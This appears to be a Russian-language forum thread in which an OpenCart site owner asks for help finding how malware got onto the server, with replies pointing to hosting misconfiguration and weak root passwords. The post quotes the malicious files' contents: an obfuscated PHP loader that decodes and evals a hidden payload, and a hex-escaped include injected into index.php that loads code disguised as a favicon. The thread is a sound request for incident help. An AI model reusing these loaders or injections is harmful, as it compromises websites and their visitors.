Jump to content
Sign in to follow this  

На сайт попадают вирусы

Recommended Posts

Здравствуйте, имеется сайт на opencart 

На сайт попадают вирусы, делающие автоматическую рассылку. На сервере появляются такие файлы ca3ytaoy.php, file52.php, ir3wfgkz.php и т.д. Файлы содержат:

<?php //00036b
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0xa29-0x579)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;



В index.php вверху добавляется:


@include "\x2fvar\x2fwww\x2fwww\x2droo\x74/da\x74a/w\x77w/m\x75sco\x6fl.c\x6fm/c\x61tal\x6fg/c\x6fntr\x6flle\x72/fa\x76ico\x6e_42\x32f56\x2eico";



Share this post

Link to post
Share on other sites

На сайте стоят 2 модуля. 

1) Управление категориями +

2) Обмен данными с 1C v8.x (Tesla-Chita)


Помогите, пожалуйста, найти уязвимость

Share this post

Link to post
Share on other sites
Guest smartcoder

Недавно клиент спрашивал похожий вопрос, вирусы типа на сайте.

В итоге сам хостер потом предоставил им такую услугу "чистку вашего сайта от вирусов":D

Может в хостинге то дело?)

Share this post

Link to post
Share on other sites

в большинстве случаем такое на шарде бывает, когда не правильно настроен FollowSymLinks  https://habrahabr.ru/sandbox/90459/

Так же довольно часто бывает - пробивают через панель управления сервером которая открыта на распашку или же через ssh который доступен под root 

в одного клиента так и было, логин root пароль 6 букв, вот и приплыли после такого 

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.


Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.